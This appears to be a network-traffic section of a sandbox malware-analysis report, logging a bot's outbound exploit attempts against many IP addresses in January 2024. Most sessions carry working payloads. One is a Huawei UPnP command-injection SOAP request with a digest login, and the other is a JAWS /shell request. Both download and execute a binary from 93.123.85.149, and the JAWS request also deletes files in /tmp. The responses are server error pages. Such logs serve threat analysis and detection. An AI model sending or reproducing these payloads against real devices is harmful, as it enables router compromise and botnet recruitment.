                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:59.355071068 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            602192.168.2.233848454.157.101.12780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.420753002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            603192.168.2.233605423.196.168.19180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.430650949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.551915884 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 61 30 63 63 34 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 33 26 23 34 36 3b 36 63 38 32 65 32 65 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8a0cc417&#46;1706279573&#46;6c82e2e7</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            604192.168.2.235286672.246.165.14180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.456854105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.608938932 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 64 61 64 33 63 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 33 26 23 34 36 3b 36 36 66 66 63 33 30 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2dad3c17&#46;1706279573&#46;66ffc30e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            605192.168.2.235654423.42.153.20280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.498891115 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.693289995 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 65 39 33 63 38 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 33 26 23 34 36 3b 33 37 35 39 65 32 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5e93c817&#46;1706279573&#46;3759e2cc</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            606192.168.2.233347286.159.25.10880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.508151054 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            607192.168.2.2350732191.82.36.1180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.548901081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.790646076 CET424INData Raw: 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32
                                                            Data Ascii: 93.123.85.149/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Fri, 26 Jan 2024 14:32:51 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            608192.168.2.2334310202.143.87.21280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.578197002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.849494934 CET697INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Server: Apache/2.2.6 (Unix) DAV/2 mod_ssl/2.2.6 OpenSSL/0.9.8e PHP/5.2.4 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7
                                                            Content-Length: 373
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 36 20 28 55 6e 69 78 29 20 44 41 56 2f 32 20 6d 6f 64 5f 73 73 6c 2f 32 2e 32 2e 36 20 4f 70 65 6e 53 53 4c 2f 30 2e 39 2e 38 65 20 50 48 50 2f 35 2e 32 2e 34 20 6d 6f 64 5f 61 70 72 65 71 32 2d 32 30 30 35 31 32 33 31 2f 32 2e 35 2e 37 20 6d 6f 64 5f 70 65 72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35 2e 38 2e 37 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.6 (Unix) DAV/2 mod_ssl/2.2.6 OpenSSL/0.9.8e PHP/5.2.4 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7 Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            609192.168.2.235209877.79.225.8580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.764719963 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.990897894 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            610192.168.2.2335100197.246.107.15137215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.792660952 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:54.060594082 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            611192.168.2.235042679.129.85.4080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:53.836183071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:54.097881079 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 26 Jan 2024 14:32:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            612192.168.2.234422654.169.210.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.420173883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            613192.168.2.233360293.184.250.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.621551037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            614192.168.2.235889434.111.133.23880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.725398064 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:56.829180002 CET441INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html; charset=UTF-8
                                                            Referrer-Policy: no-referrer
                                                            Content-Length: 273
                                                            Date: Fri, 26 Jan 2024 14:32:56 GMT
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            615192.168.2.2334030198.57.211.4880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.773865938 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:56.926809072 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:55 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
